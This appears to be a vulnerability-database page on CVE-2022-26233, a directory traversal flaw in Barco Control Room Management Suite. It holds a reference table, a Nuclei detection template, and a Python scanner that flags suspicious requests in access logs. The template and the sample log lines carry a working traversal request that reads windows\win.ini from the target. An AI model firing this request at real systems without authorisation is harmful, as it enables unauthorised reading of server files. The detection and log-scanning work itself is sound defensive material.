| Title | Published | Views | Reporter |
|---|---|---|---|
| Barco Control Room Management Suite Directory Traversal Vulnerability | 6 Apr 2022 00:00 | – | zdt |
| CVE-2022-26233 | 3 Apr 2022 23:15 | – | attackerkb |
| Microsoft Patch Tuesday August 2022: DogWalk, Exchange EOPs, 13 potentially dangerous, 2 funny, 3 mysterious vulnerabilities | 23 Aug 2022 00:00 | – | avleonov |
| CVE-2022-26233 | 4 Apr 2022 02:27 | – | circl |
| Barco Control Room Path Traversal Vulnerability | 3 Apr 2022 00:00 | – | cnnvd |
| CVE-2022-26233 | 3 Apr 2022 22:05 | – | cve |
| CVE-2022-26233 | 3 Apr 2022 22:05 | – | cvelist |
| CVE-2022-26233 | 3 Apr 2022 23:15 | – | nvd |
| Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 2017 00:00 | – | openvas |
| CVE-2022-26233 | 3 Apr 2022 23:15 | – | osv |

```yaml
id: CVE-2022-26233

info:
  name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
  reference:
    - https://0day.today/exploit/37579
    - http://seclists.org/fulldisclosure/2022/Apr/0
    - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26233
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-26233
    cwe-id: CWE-22
    epss-score: 0.15028
    epss-percentile: 0.96313
    cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: barco
    product: control_room_management_suite
  tags: cve,cve2022,barco,lfi,seclists,packetstorm,vuln

http:
  - raw:
      - |+
        GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a004830460221008c96e8ba7e395a807aaff4ae17ad0fa18b556b822b7ee5d62a402839ba05c585022100c220888dc3fc9a7c6f59fd559681f9c6296d25eab6e51251373f2458d7572cc4:922c64590222798bb761d5b6d8e72950
```
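
A defender-side counterpart to the template's request pattern, added here as an example and not part of the template or of this page's own code: it scans web access-log lines for request targets that begin with `/..\..`. The combined log format, the function names and the sample lines are assumptions constructed for illustration, and matching percent-encoded or forward-slash forms goes beyond the literal substring the description names.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Target whose first two path segments are "..", separated by "\" or "/"
TRAVERSAL_RE = re.compile(r'^/\.\.[\\/]\.\.')


def normalise(target, rounds=3):
    """Percent-decode a bounded number of times so %5c / %2e forms compare equal."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def is_leading_traversal(target):
    """True when the (decoded) request target starts with /..\\.. or /../.."""
    return bool(TRAVERSAL_RE.match(normalise(target)))


def scan(lines):
    """Return (line_number, client, raw_target) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and is_leading_traversal(m.group("target")):
            hits.append((n, line.split()[0], m.group("target")))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Apr/2022:10:00:05 +0000] "GET /..\\..\\..\\windows\\win.ini HTTP/1.1" 200 92',
    '198.51.100.7 - - [06/Apr/2022:10:00:09 +0000] "GET /..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 92',
    '192.0.2.10 - - [06/Apr/2022:10:00:12 +0000] "GET /docs/../img/logo.png HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, client, target in scan(SAMPLE_LOG):
        print(f"line {n}: {client} requested {target!r}")
```

A hit with a 200 status on a host running an affected build is worth triaging first, since the template's matcher treats a returned `win.ini` body as confirmation.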